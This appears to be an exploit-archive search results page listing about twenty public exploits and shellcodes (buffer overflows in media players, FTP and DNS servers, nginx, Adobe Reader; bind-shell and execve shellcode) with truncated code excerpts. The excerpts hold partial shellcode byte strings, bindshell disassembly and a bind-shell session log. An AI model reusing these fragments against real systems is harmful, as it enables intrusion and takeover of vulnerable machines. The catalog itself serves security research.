7260 matches found
OTSTurntables 1.00.048 - (m3u/ofl) Local BOF Exploit (SEH)
No description provided by source. Exploit Title: OTSTurntables 1.00.028 m3u/ofl Local BOF Exploit SEH Date: 11/24/2010 Author: 0v3r Software Link: http://www.otsturntables.com/download-otsturntables-free/ Version: 1.00.048 Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python import sys win32bi...
htpasswd Apache 1.3.31 - Local Exploit
No description provided by source. !/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = \x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68...
Ecartis 1.0 .0,0.129 a Listar Multiple Local Buffer Overflow Vulnerabilities (2)
No description provided by source. source: http://www.securityfocus.com/bid/4271/info Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems. Multiple local buffer overflow conditions have been...
KnFTP Server Buffer Overflow Exploit
No description provided by source. !/usr/bin/python tested on windows xp sp3 overwrites EIP seh is overwritten with larger payloads knftpd.exe is the only non safeseh module import sys,socket print \n===================== print KnFTP Buffer Overflow print Written by Blake print...
97 bytes Linx x86 bind shell port 64533
No description provided by source. include stdio.h include string.h / 1 1 0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 by Magnefikko 05.07.2010 [email protected] Promhyl Studies ::...
Linux x86 netcat bindshell port 8080 - 75 bytes
No description provided by source. / 08048060 start: 8048060: eb 2a jmp 804808c GotoCall 08048062 shellcode: 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 0f mov %al,0xf%esi 804806b: 88 46 19 mov %al,0x19%esi 804806e: 89 76 1a mov %esi,0x1a%esi...
Adobe Reader PDF LibTiff Integer Overflow Code Execution
No description provided by source. doc=''' Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: =8.3.0, =9.3.0 CVE: 2010-0188 Author: villy villys777 at gmail.com Site: http://bugix-security.blogspot.com/ Tested : succesfully tested on Adobe Reader...
Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/python Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit Date: 10/10/2010 Author: Xsploited Security aka xsploitedsec URL: http://www.x-sploited.com/ Contact: xsploitedsecurity at x-sploited.com Software Link:...
Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com/FailureToLaunch-ppc.pl Code by Kevin Finisterre kflistsatdigitalmunitiondotcom Much appreciation goes to John H for all kindsa random shit like exploiting Veritas and other random things in the past core... where the...
Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2)
No description provided by source. Exploit v2 features: - Target Remote port 445 by default but requires auth - Manual target for dynamic tcp port without auth - Automatic search for dynamic dns rpc port - Local and remote OS fingerprinting auto target - Windows 2000 server and Windows 2003 serve...
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit
No description provided by source. ?php / Inphex 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1\n telnet 192.168.2.32 4444 Microsoft Windows XP Version 5.1.2600 C Copyright 1985-2001 Microsoft Corp. C:\apache 7ffdf020 7c911005...
SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)
No description provided by source. / Shoutcast = 1.9.4 exploit by crash-x Trys to upload the shellcode to a fixed address and execute it. This exploit was not written bei Simon 'Zodiac' Moser segfault.ch. / include stdio.h include stdlib.h include stdarg.h include string.h include sys/types.h...
AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit
No description provided by source. !/usr/bin/python Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow Author: cikumel @mhxx and y0k @riy0wid from @spentera research Website: http://www.spentera.com Platform: Windows Tested on: Windows XP SP3 Based on POC by Vulnerability-Lab...
aSc Timetables 2013 - Stack Buffer Overflow Vulnerability
No description provided by source. !/usr/bin/python Title : ASC Timetables 2013 - Stack Buffer Overflow Vulnerability Researcher : Souhail Hammou Dark-Puzzle Research Team : http://itsecurity.ma Facebook : http://www.facebook.com/dark.puzzle.sec Date : 22/06/2013 Download Website :...
IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. Exploit: / PSTiwconfig /sbin/iwconfig...
nginx 0.6.38 - Heap Corruption Exploit
No description provided by source. !/usr/bin/env python Exploit Title: nginx heap corruption Date: 08/26/2010 Author: aaron conole [email protected] Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz Version: = 0.6.38, = 0.7.61 Tested on: BT4R1 running nginx 0.6.38 locally CVE: 2009-26...
52 byte Linux MIPS execve
No description provided by source. include stdio.h / entropy at phiral.net 52 byte linux mips shellcode oh werd [email protected] /encode/1/2 cat s.s .section .text .globl start .set noreorder start: li $a2, 0x666 p: bltzal $a2, p slti $a2, $zero, -1 addu $sp, $sp, -32 addu $a0, $ra, 4097 addu...
MP3 Studio 1.0 - (.mpf) Local BOF Exploit (SEH)
No description provided by source. !/usr/bin/perl MP3 Studio v1.0 mpf File Local BOF Exploit SEH Exploited by: Koshi Download: http://www.software112.com/products/mp3-millennium+download.html Based on PoC/findings by HACK4LOVE http://milw0rm.com/exploits/9277 Tested on WinXP SP3 I've used address...
62 bytes setreuid(0,0) execve("/bin/sh",NULL,NULL) XOR Encoded Linux Shellcode
No description provided by source. / Author : gunslinger yudha.gunslingeratgmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian special thanks to : r0073r inj3ct0r.com, d3hydr8 darkc0de.com, ty miller projectshellcode.com, jonathan...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...